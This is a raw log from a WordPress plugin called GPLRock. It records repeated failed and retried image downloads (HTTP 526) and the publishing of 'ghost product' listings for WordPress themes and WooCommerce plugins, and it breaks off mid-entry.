GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/urim---creative-agency-wordpress-theme-12487.webp for product urim-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:21:52 UTC] GPLRock WARNING: Image download failed for product urim-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/urim---creative-agency-wordpress-theme-12487.webp [05-Apr-2026 10:21:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: urim-creative-agency-wordpress-theme [05-Apr-2026 10:21:52 UTC] GPLRock: Image downloaded successfully for product queeny-fashion-lingerie-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d170ebe9.webp [05-Apr-2026 10:21:52 UTC] GPLRock: Using pre-downloaded image for product queeny-fashion-lingerie-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d170ebe9.webp [05-Apr-2026 10:21:52 UTC] GPLRock: Ghost product published with image - Product ID: queeny-fashion-lingerie-wordpress-theme [05-Apr-2026 10:21:52 UTC] GPLRock: Image downloaded successfully for product marco-good-fast-food-restaurant-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67d97965.webp [05-Apr-2026 10:21:52 UTC] GPLRock: Using pre-downloaded image for product marco-good-fast-food-restaurant-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67d97965.webp [05-Apr-2026 10:21:52 UTC] GPLRock: Ghost product published with image - Product ID: marco-good-fast-food-restaurant-wordpress-theme [05-Apr-2026 10:21:52 UTC] GPLRock: Image download failed for product factory-industry-construction-building-wordpress-theme-unibuild (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:21:54 UTC] GPLRock: Image download failed for product factory-industry-construction-building-wordpress-theme-unibuild (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:21:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/factory-industry-construction-building-wordpress-theme---unibuild-10577.webp for product factory-industry-construction-building-wordpress-theme-unibuild after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:21:56 UTC] GPLRock: Image download failed for product factory-industry-construction-building-wordpress-theme-unibuild (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:21:59 UTC] GPLRock: Image download failed for product factory-industry-construction-building-wordpress-theme-unibuild (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/factory-industry-construction-building-wordpress-theme---unibuild-10577.webp for product factory-industry-construction-building-wordpress-theme-unibuild after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:01 UTC] GPLRock WARNING: Image download failed for product factory-industry-construction-building-wordpress-theme-unibuild. URL: https://meldwp.com/wp-content/uploads/factory-industry-construction-building-wordpress-theme---unibuild-10577.webp [05-Apr-2026 10:22:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: factory-industry-construction-building-wordpress-theme-unibuild [05-Apr-2026 10:22:01 UTC] GPLRock: Image download failed for product torun-it-services-company-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:03 UTC] GPLRock: Image download failed for product torun-it-services-company-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/torun---it-services-company-wordpress-theme--rtl-21829.webp for product torun-it-services-company-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:05 UTC] GPLRock: Image download failed for product torun-it-services-company-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:07 UTC] GPLRock: Image download failed for product torun-it-services-company-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/torun---it-services-company-wordpress-theme--rtl-21829.webp for product torun-it-services-company-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:09 UTC] GPLRock WARNING: Image download failed for product torun-it-services-company-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/torun---it-services-company-wordpress-theme--rtl-21829.webp [05-Apr-2026 10:22:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: torun-it-services-company-wordpress-theme-rtl [05-Apr-2026 10:22:09 UTC] GPLRock: Image download failed for product conbix-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:12 UTC] GPLRock: Image download failed for product conbix-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conbix---business-consulting-wordpress-theme-31105.webp for product conbix-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:14 UTC] GPLRock: Image download failed for product conbix-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:16 UTC] GPLRock: Image download failed for product conbix-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conbix---business-consulting-wordpress-theme-31105.webp for product conbix-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:18 UTC] GPLRock WARNING: Image download failed for product conbix-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/conbix---business-consulting-wordpress-theme-31105.webp [05-Apr-2026 10:22:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: conbix-business-consulting-wordpress-theme [05-Apr-2026 10:22:18 UTC] GPLRock: Image download failed for product constructor-one-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:20 UTC] GPLRock: Image download failed for product constructor-one-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/constructor-one---construction-wordpress-theme-5376.webp for product constructor-one-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:22 UTC] GPLRock: Image download failed for product constructor-one-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:25 UTC] GPLRock: Image download failed for product constructor-one-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/constructor-one---construction-wordpress-theme-5376.webp for product constructor-one-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:27 UTC] GPLRock WARNING: Image download failed for product constructor-one-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/constructor-one---construction-wordpress-theme-5376.webp [05-Apr-2026 10:22:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: constructor-one-construction-wordpress-theme [05-Apr-2026 10:22:27 UTC] GPLRock: Image download failed for product universal-corporate-wordpress-multi-concept-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:29 UTC] GPLRock: Image download failed for product universal-corporate-wordpress-multi-concept-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/universal---corporate-wordpress-multi-concept-theme-18867.webp for product universal-corporate-wordpress-multi-concept-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:31 UTC] GPLRock: Image download failed for product universal-corporate-wordpress-multi-concept-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:33 UTC] GPLRock: Image download failed for product universal-corporate-wordpress-multi-concept-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/universal---corporate-wordpress-multi-concept-theme-18867.webp for product universal-corporate-wordpress-multi-concept-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:35 UTC] GPLRock WARNING: Image download failed for product universal-corporate-wordpress-multi-concept-theme. URL: https://meldwp.com/wp-content/uploads/universal---corporate-wordpress-multi-concept-theme-18867.webp [05-Apr-2026 10:22:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: universal-corporate-wordpress-multi-concept-theme [05-Apr-2026 10:22:36 UTC] GPLRock: Image download failed for product lumi-tech-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:38 UTC] GPLRock: Image download failed for product lumi-tech-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lumi---tech-startup-wordpress-theme-25740.webp for product lumi-tech-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:40 UTC] GPLRock: Image download failed for product lumi-tech-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:42 UTC] GPLRock: Image download failed for product lumi-tech-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lumi---tech-startup-wordpress-theme-25740.webp for product lumi-tech-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:44 UTC] GPLRock WARNING: Image download failed for product lumi-tech-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lumi---tech-startup-wordpress-theme-25740.webp [05-Apr-2026 10:22:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lumi-tech-startup-wordpress-theme [05-Apr-2026 10:22:44 UTC] GPLRock: Image download failed for product electrician-electricity-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:46 UTC] GPLRock: Image download failed for product electrician-electricity-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/electrician---electricity-services-wordpress-theme-5788.webp for product electrician-electricity-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:49 UTC] GPLRock: Image download failed for product electrician-electricity-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:51 UTC] GPLRock: Image download failed for product electrician-electricity-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:22:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/electrician---electricity-services-wordpress-theme-5788.webp for product electrician-electricity-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:22:53 UTC] GPLRock WARNING: Image download failed for product electrician-electricity-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/electrician---electricity-services-wordpress-theme-5788.webp [05-Apr-2026 10:22:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: electrician-electricity-services-wordpress-theme [05-Apr-2026 10:23:14 UTC] GPLRock: Image download failed for product woocommerce-ajax-cart-added-to-cart-popup-floatingslidingpopup-all-in-one-cartcheckout-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:16 UTC] GPLRock: Image download failed for product woocommerce-ajax-cart-added-to-cart-popup-floatingslidingpopup-all-in-one-cartcheckout-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-ajax-cart--added-to-cart-popup---floatingslidingpopup-all-in-one-car-24289.webp for product woocommerce-ajax-cart-added-to-cart-popup-floatingslidingpopup-all-in-one-cartcheckout-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:18 UTC] GPLRock: Image download failed for product woocommerce-ajax-cart-added-to-cart-popup-floatingslidingpopup-all-in-one-cartcheckout-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:21 UTC] GPLRock: Image download failed for product woocommerce-ajax-cart-added-to-cart-popup-floatingslidingpopup-all-in-one-cartcheckout-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-ajax-cart--added-to-cart-popup---floatingslidingpopup-all-in-one-car-24289.webp for product woocommerce-ajax-cart-added-to-cart-popup-floatingslidingpopup-all-in-one-cartcheckout-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:23 UTC] GPLRock WARNING: Image download failed for product woocommerce-ajax-cart-added-to-cart-popup-floatingslidingpopup-all-in-one-cartcheckout-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-ajax-cart--added-to-cart-popup---floatingslidingpopup-all-in-one-car-24289.webp [05-Apr-2026 10:23:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-ajax-cart-added-to-cart-popup-floatingslidingpopup-all-in-one-cartcheckout-plugin [05-Apr-2026 10:23:23 UTC] GPLRock: Image download failed for product image-slider-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:25 UTC] GPLRock: Image download failed for product image-slider-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-slider-plugin-for-wordpress-29686.webp for product image-slider-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:27 UTC] GPLRock: Image download failed for product image-slider-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:29 UTC] GPLRock: Image download failed for product image-slider-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-slider-plugin-for-wordpress-29686.webp for product image-slider-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:31 UTC] GPLRock WARNING: Image download failed for product image-slider-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/image-slider-plugin-for-wordpress-29686.webp [05-Apr-2026 10:23:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: image-slider-plugin-for-wordpress [05-Apr-2026 10:23:32 UTC] GPLRock: Image download failed for product gallery-plugins-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:34 UTC] GPLRock: Image download failed for product gallery-plugins-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gallery-plugins-bundle-9268.webp for product gallery-plugins-bundle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:36 UTC] GPLRock: Image download failed for product gallery-plugins-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:38 UTC] GPLRock: Image download failed for product gallery-plugins-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gallery-plugins-bundle-9268.webp for product gallery-plugins-bundle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:40 UTC] GPLRock WARNING: Image download failed for product gallery-plugins-bundle. URL: https://meldwp.com/wp-content/uploads/gallery-plugins-bundle-9268.webp [05-Apr-2026 10:23:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gallery-plugins-bundle [05-Apr-2026 10:23:40 UTC] GPLRock: Image download failed for product float-menu-pro-enhance-wordpress-navigation-with-a-customizable-floating-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:42 UTC] GPLRock: Image download failed for product float-menu-pro-enhance-wordpress-navigation-with-a-customizable-floating-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/float-menu-pro--enhance-wordpress-navigation-with-a-customizable-floating-menu-33019.webp for product float-menu-pro-enhance-wordpress-navigation-with-a-customizable-floating-menu after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:45 UTC] GPLRock: Image download failed for product float-menu-pro-enhance-wordpress-navigation-with-a-customizable-floating-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:47 UTC] GPLRock: Image download failed for product float-menu-pro-enhance-wordpress-navigation-with-a-customizable-floating-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/float-menu-pro--enhance-wordpress-navigation-with-a-customizable-floating-menu-33019.webp for product float-menu-pro-enhance-wordpress-navigation-with-a-customizable-floating-menu after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:49 UTC] GPLRock WARNING: Image download failed for product float-menu-pro-enhance-wordpress-navigation-with-a-customizable-floating-menu. URL: https://meldwp.com/wp-content/uploads/float-menu-pro--enhance-wordpress-navigation-with-a-customizable-floating-menu-33019.webp [05-Apr-2026 10:23:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: float-menu-pro-enhance-wordpress-navigation-with-a-customizable-floating-menu [05-Apr-2026 10:23:49 UTC] GPLRock: Image download failed for product customer-chat-for-whatsapp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:51 UTC] GPLRock: Image download failed for product customer-chat-for-whatsapp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/customer-chat-for-whatsapp-31083.webp for product customer-chat-for-whatsapp after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:53 UTC] GPLRock: Image download failed for product customer-chat-for-whatsapp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:55 UTC] GPLRock: Image download failed for product customer-chat-for-whatsapp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:23:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/customer-chat-for-whatsapp-31083.webp for product customer-chat-for-whatsapp after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:23:58 UTC] GPLRock WARNING: Image download failed for product customer-chat-for-whatsapp. URL: https://meldwp.com/wp-content/uploads/customer-chat-for-whatsapp-31083.webp [05-Apr-2026 10:23:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: customer-chat-for-whatsapp [05-Apr-2026 10:23:58 UTC] GPLRock: Image download failed for product gear-html5-audio-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:00 UTC] GPLRock: Image download failed for product gear-html5-audio-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gear-html5-audio-player-2408.webp for product gear-html5-audio-player after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:02 UTC] GPLRock: Image download failed for product gear-html5-audio-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:04 UTC] GPLRock: Image download failed for product gear-html5-audio-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gear-html5-audio-player-2408.webp for product gear-html5-audio-player after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:06 UTC] GPLRock WARNING: Image download failed for product gear-html5-audio-player. URL: https://meldwp.com/wp-content/uploads/gear-html5-audio-player-2408.webp [05-Apr-2026 10:24:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gear-html5-audio-player [05-Apr-2026 10:24:06 UTC] GPLRock: Image download failed for product sales-countdown-timer-for-woocommerce-and-wordpress-checkout-countdown (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:09 UTC] GPLRock: Image download failed for product sales-countdown-timer-for-woocommerce-and-wordpress-checkout-countdown (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sales-countdown-timer-for-woocommerce-and-wordpress---checkout-countdown-31945.webp for product sales-countdown-timer-for-woocommerce-and-wordpress-checkout-countdown after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:11 UTC] GPLRock: Image download failed for product sales-countdown-timer-for-woocommerce-and-wordpress-checkout-countdown (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:13 UTC] GPLRock: Image download failed for product sales-countdown-timer-for-woocommerce-and-wordpress-checkout-countdown (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sales-countdown-timer-for-woocommerce-and-wordpress---checkout-countdown-31945.webp for product sales-countdown-timer-for-woocommerce-and-wordpress-checkout-countdown after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:15 UTC] GPLRock WARNING: Image download failed for product sales-countdown-timer-for-woocommerce-and-wordpress-checkout-countdown. URL: https://meldwp.com/wp-content/uploads/sales-countdown-timer-for-woocommerce-and-wordpress---checkout-countdown-31945.webp [05-Apr-2026 10:24:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sales-countdown-timer-for-woocommerce-and-wordpress-checkout-countdown [05-Apr-2026 10:24:15 UTC] GPLRock: Image download failed for product woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:17 UTC] GPLRock: Image download failed for product woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces-32337.webp for product woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:19 UTC] GPLRock: Image download failed for product woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:22 UTC] GPLRock: Image download failed for product woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces-32337.webp for product woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:24 UTC] GPLRock WARNING: Image download failed for product woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces. URL: https://meldwp.com/wp-content/uploads/woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces-32337.webp [05-Apr-2026 10:24:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-order-on-whatsapp-for-wcfm-multi-vendor-marketplaces [05-Apr-2026 10:24:24 UTC] GPLRock: Image download failed for product international-sms-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:26 UTC] GPLRock: Image download failed for product international-sms-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/international-sms-for-woocommerce-29090.webp for product international-sms-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:28 UTC] GPLRock: Image download failed for product international-sms-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:30 UTC] GPLRock: Image download failed for product international-sms-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/international-sms-for-woocommerce-29090.webp for product international-sms-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:32 UTC] GPLRock WARNING: Image download failed for product international-sms-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/international-sms-for-woocommerce-29090.webp [05-Apr-2026 10:24:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: international-sms-for-woocommerce [05-Apr-2026 10:24:32 UTC] GPLRock: Image download failed for product moneris-direct-ca-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:35 UTC] GPLRock: Image download failed for product moneris-direct-ca-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moneris-direct-ca-gateway-for-woocommerce-8858.webp for product moneris-direct-ca-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:37 UTC] GPLRock: Image download failed for product moneris-direct-ca-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:39 UTC] GPLRock: Image download failed for product moneris-direct-ca-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:24:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moneris-direct-ca-gateway-for-woocommerce-8858.webp for product moneris-direct-ca-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:24:41 UTC] GPLRock WARNING: Image download failed for product moneris-direct-ca-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/moneris-direct-ca-gateway-for-woocommerce-8858.webp [05-Apr-2026 10:24:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moneris-direct-ca-gateway-for-woocommerce [05-Apr-2026 10:25:13 UTC] GPLRock: Image downloaded successfully for product woocommerce-tm-extra-product-options (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0354405f.jpg [05-Apr-2026 10:25:13 UTC] GPLRock: Using pre-downloaded image for product woocommerce-tm-extra-product-options: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0354405f.jpg [05-Apr-2026 10:25:13 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-tm-extra-product-options [05-Apr-2026 10:25:15 UTC] GPLRock: Image downloaded successfully for product newsmag-news-magazine-newspaper (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47c88ab3.jpg [05-Apr-2026 10:25:15 UTC] GPLRock: Using pre-downloaded image for product newsmag-news-magazine-newspaper: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47c88ab3.jpg [05-Apr-2026 10:25:15 UTC] GPLRock: Ghost product published with image - Product ID: newsmag-news-magazine-newspaper [05-Apr-2026 10:25:16 UTC] GPLRock: Image downloaded successfully for product woocommerce-accommodation-bookings (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6eab9bd4.jpg [05-Apr-2026 10:25:16 UTC] GPLRock: Using pre-downloaded image for product woocommerce-accommodation-bookings: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6eab9bd4.jpg [05-Apr-2026 10:25:16 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-accommodation-bookings [05-Apr-2026 10:25:18 UTC] GPLRock: Image downloaded successfully for product shoptimizer-fastest-woocommerce-wordpress-themes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10595621.jpg [05-Apr-2026 10:25:18 UTC] GPLRock: Using pre-downloaded image for product shoptimizer-fastest-woocommerce-wordpress-themes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10595621.jpg [05-Apr-2026 10:25:18 UTC] GPLRock: Ghost product published with image - Product ID: shoptimizer-fastest-woocommerce-wordpress-themes [05-Apr-2026 10:25:19 UTC] GPLRock: Image downloaded successfully for product woocommerce-subscriptions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dec065cf.jpg [05-Apr-2026 10:25:19 UTC] GPLRock: Using pre-downloaded image for product woocommerce-subscriptions: 